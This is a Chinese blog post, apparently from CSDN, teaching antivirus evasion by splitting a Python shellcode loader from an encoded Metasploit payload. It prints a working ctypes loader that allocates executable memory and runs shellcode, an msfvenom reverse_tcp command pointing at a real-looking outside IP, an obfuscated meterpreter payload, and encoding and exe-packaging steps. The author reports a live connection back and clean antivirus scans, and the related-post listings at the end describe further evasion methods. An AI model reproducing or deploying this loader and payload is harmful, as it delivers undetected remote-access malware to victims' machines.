【免杀】分离免杀(python)

已于 2023-06-28 21:04:16 修改
阅读量701 收藏 3
点赞数
分类专栏: 免杀 文章标签: python 开发语言 网络安全
于 2023-06-28 21:02:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangshuaiijie/article/details/131431961
版权

原理

shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名
shellcode loader加载器是用来运行shellcode的加载器,用什么语言来写都可以

思路就是将shellcode和loader分离开来,用loader加载存在于普通文件中的shellcode

实现

先将loader和shellcode都加密
loader

def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

shellcode用msf生成msfvenom -p python/meterpreter/reverse_tcp LHOST=120.27.114.84 LPORT=7000 -f raw > -o shell.py

exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNo9UE1LxDAQPTe/IrckGENa6q4sVhDxICKCuzcRaZNRQ9M0JFmtiv/dDVm8zPDevHnzYSY/h4TjrEZI/NuagQ99hFXLYwp7lXgyE6DXOeAFG4dD796A1pJtUJXC1yFWsSvNoiTa8CPePlzfvWx3jzdX9yzrhJqdA5UoJXUjRbMWdd2K85bwtZSSZc0QoB9RBYsCn7J5ni6iBfD0jCHblaXE3vlejZRc3hIeRQD1QVvGnuQz0t0RW4Y+340FbMFRzS7swU6f/FdPC80QLKBovltoUPPkA8RIywvEsGozqSEr+Q+JZBN/GfoDFNtfIw==')[0])))

然后对loader和shellcode分别加密存储到别的文件中(怎么加密都行但是最后要用相对应的方式解密)
shellcode加密

import base64 
import sys 

f = open("shellcode.txt")
t = f.read()
encoded = base64.b64encode(base64.b32encode(t.encode('UTF-8'))) #
print(encoded)
f.close()

loader加密

from base64 import b64encode

# 下面是加载器的核心函数
code = """def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))"""
print(b64encode(code.encode()))

将加密的数据写入到另外的文件中,loader.txt和shellcode1.txt中

from base64 import b32decode, b64decode, b64encode
import ctypes
import base64
import py2exe
import distutils

f = open('shellcode1.txt')
code = f.read()
code = b32decode(b64decode(code))
f.close()

exec(code.decode())

f2=open('loader.txt')
loader=f2.read()
f2.close()
exec(b64decode(loader).decode())

shellCodeLoad(shellcode)

运行代码,成功上线
在这里插入图片描述
在这里插入图片描述

打包exe

现在功能实现完了,该打包了,linux可能都有python环境,但是window不一定,所以需要打包成exe文件,需要pyinstaller或者py2exe

pip install pyinstaller或
pip install py2exe

pyinstaller安装使用
py2exe安装使用
还需要手动把loader.txt和shellcode1.txt放到和exe文件一个目录,以后使用的时候就打包直接发靶机上

都可以,我测试过两种打包方法都不会报毒

结果

报毒报的是之前我打靶机时候下的exp或者别的毒
在这里插入图片描述
在这里插入图片描述
不知道什么情况,是不检测zip吗?另一个检测网站也是这样子的
在这里插入图片描述

参考链接

逢星
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Python远程加载分离、反序列化免杀
qq_43606723的博客
08-15 1715
shellcode.py远程加载反序列化免杀手法
通过Python实现Payload分离免杀过程详解
09-16
### 通过Python实现Payload分离免杀过程详解 在网络安全领域,Payload分离技术是一种常见的方法,用于提高恶意软件的隐蔽性和生存能力。本文旨在详细介绍如何利用Python实现Payload的分离免杀,通过具体示例帮助...
Python常见的免杀方式
m0_62207482的博客
02-09 1246
使用pyinstaller生成的可执行文件 本身就具有一定的免杀能力,但是在与杀毒软件对抗时,部分杀毒软件也可以通 过分析可执行文件的内容来判断文件是否为恶意程序,导致这些代码仍然具有被 杀的可能。·BackDoor-factory工具,又称后门工厂(BDF),利用该工具,可以在不破 坏原来的可执行文件功能的前提下,在代码中注入恶意的shellcode攻击代码。一部分杀毒软件的API拦截操作是通过对API的前几个字节内容的 监测实现的,如果跳过了头部字节,就可以避开这种拦截方式。· 未导出API。
免杀基本知识,shellcode混淆免杀
白帽子凯哥聊黑客
06-17 978
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
C实现分离免杀
春日野穹
02-28 2381
前期准备 1.编译好mian.exe,源码如下 #include <stdio.h> #include <windows.h> int main(int argc,char* argv[]) { //打开要执行的ShellCode文件 HANDLE hFile = CreateFileA("payload.bin", GENERIC_READ, 0, NULL, OPEN_ALWAYS, 0, NULL); if (hFile==INVALID_HANDLE_VALUE)
Python shellcode免杀
qq_25761407的博客
04-02 5532
Python shellcode免杀
Python-shellcode免杀分离
m0_63917373的博客
06-01 2713
shellcode免杀
c++静态免杀修正版
crowsec
05-16 1252
在Github上看到一个c++的免杀,在4月6号的时候,还是bypass 很多的,但是一个月过去了,我执行之后发现了只能过火绒。
免杀分离免杀python)_shellcode loader免杀
2401_84140130的博客
04-27 144
shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名shellcode loader加载器是用来运行shellcode的加载器,用什么语言来写都可以思路就是将shellcodeloader分离开来,用loader加载存在于普通文件中的shellcode
python打包的exe如何免杀_通过Python实现Payload分离免杀过程详解
weixin_39741101的博客
11-26 226
缺点:编译成exe以后体积过大实现:msf生成shellcode代码:将payload给copy下来,去除引号。\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33\x49\x6f\x44\x37\x64\x4b...
免杀】C2远控-shellcode分离-python
qq_55349490的博客
06-07 1037
因此可以在cs的shellcode调用sleep休眠将可执行内存区域加密,在休眠结束时再将内存解密来规避杀软内存扫描达到免杀的目的。除了用base64方式加密外,也可以尝试用文件读取的方式进行加密,二者代码差不多,只不过是把加载器的加密代码放到文件里面罢了。常用的打包有三种3打包器。除了以上的方式,还有很多种加密,可以自己发挥想象进行加密,如也可以通过远程文件读取加载器代码进行加密。既然会检测加载器代码,那我们将加载器代码加密不就可以防止其检测了吗。你加密混淆分离,最后还是会回归原来的代码并被执行。
使用Python进行防病毒免杀解析
09-18
主要介绍了使用Python进行防病毒免杀,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
远控免杀源码,最新教程+源码
10-21
【远程控制与免杀技术详解】 远程控制技术是IT领域中的一个重要部分,它允许用户通过网络从一个设备操控另一个设备。这种技术广泛应用于系统管理、技术支持以及恶意软件中。"远控免杀源码"指的是设计用于避开安全...
很强大的的加密免杀工具
11-07
熟练掌握各种编程语言,如C、C++、Python、Java等,以及逆向工程和汇编语言,是构建高效免杀工具的基础。 压缩包中的Malware MultiTool [by V1rtualGh0st](1)可能是一个集合多种免杀技术的工具集,由V1rtualGh0st这...
【ROS2】概念:高级-构建系统
cxyhjl的博客
07-30 376
目录构建工具构建助手ament_package包ament_cmake仓库ament_lint仓库元构建工具构建系统是允许开发人员根据需要构建其 ROS 2 代码的工具。ROS 2 在很大程度上依赖于将代码划分为包,每个包都包含一个清单文件 (package.xml)。此清单文件包含有关包的基本元数据,包括其对其他包的依赖性。此清单是元构建工具正常运行所必需的。ROS ...
Selenium与WebDriver:Errno 8 Exec格式错误的多种解决方案
ip16yun的博客
07-30 368
在使用Selenium和WebDriver进行网页自动化时,可能会遇到各种错误。其中一个常见问题是执行格式错误(Errno 8 Exec format error)。这个错误通常在运行ChromeDriver时出现,错误提示涉及路径中的某个文件。本文将概述这个问题的背景,并提供多种解决方案,包括如何使用代理IP技术进行数据抓取。
exceptionx:灵活便捷的Python异常处理库,让异常处理更高效!
最新发布
__
07-31 356
exceptionx 是一个灵活且便捷的Python异常处理库,允许你动态创建异常类,并提供多种异常处理机制。
python字符串数据容器练习(replace,split,count)
2301_79600015的博客
07-31 452
Python字符串是由一系列字符组成的数据类型。在Python中,字符串是不可变的,这意味着一旦创建了一个字符串,就不能修改它的内容。以下是关于Python字符串的一些重要知识点:1. 字符串的基本操作:拼接字符串:使用`+`运算符。重复字符串:使用`*`运算符。索引和切片:使用`[]`和`:`操作符访问字符串中的子串。长度:使用`len()`函数获取字符串长度。转换大小写:使用`upper()`和`lower()`方法。分割和连接:使用`split()`和`join()`方法。
python 免杀
09-11
Python免杀是指在编写Python恶意代码时,通过一系列技术手段绕过杀毒软件的检测和阻止。在进行Python免杀时,可以采取多种常用的静态免杀技术,如特征码定位修改、填充花指令、文件加壳、内存执行、shellcode混淆、shellcodeloader分离、木马资源修改和调用系统白名单等。这些技术可以帮助我们在编写Python恶意代码时避免被杀毒软件检测到。 其中,特征码定位修改是指通过修改代码中的特征码或者特征码的位置,使得杀毒软件无法识别恶意代码。填充花指令是在代码中插入一些无实际功能的指令,以混淆代码结构,增加杀毒软件的分析难度。文件加壳是将恶意代码嵌入到其他可信的文件中,以绕过杀毒软件的检测。内存执行是将恶意代码直接加载到内存中执行,避免了被杀毒软件静态检测的可能。shellcode混淆是通过对shellcode进行变形或加密,使其难以被杀毒软件识别。shellcodeloader分离是将shellcode和加载器分离,使得杀毒软件难以检测到完整的恶意代码。木马资源修改是通过修改恶意代码所依赖的资源文件或者库文件,绕过杀毒软件的检测。调用系统白名单是指利用操作系统的合法功能或者系统自带的程序来执行恶意代码,使其被认为是正常行为而不被杀毒软件拦截。 需要注意的是,不同语言shellcodeloader免杀效果上有所差异,而Python免杀中的效果相对较好。此外,选择小众语言和不同的exe打包器也可以提高免杀效果。同时,在编写Python恶意代码时,尽量避免使用敏感词汇,以降低被杀毒软件查杀的概率。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值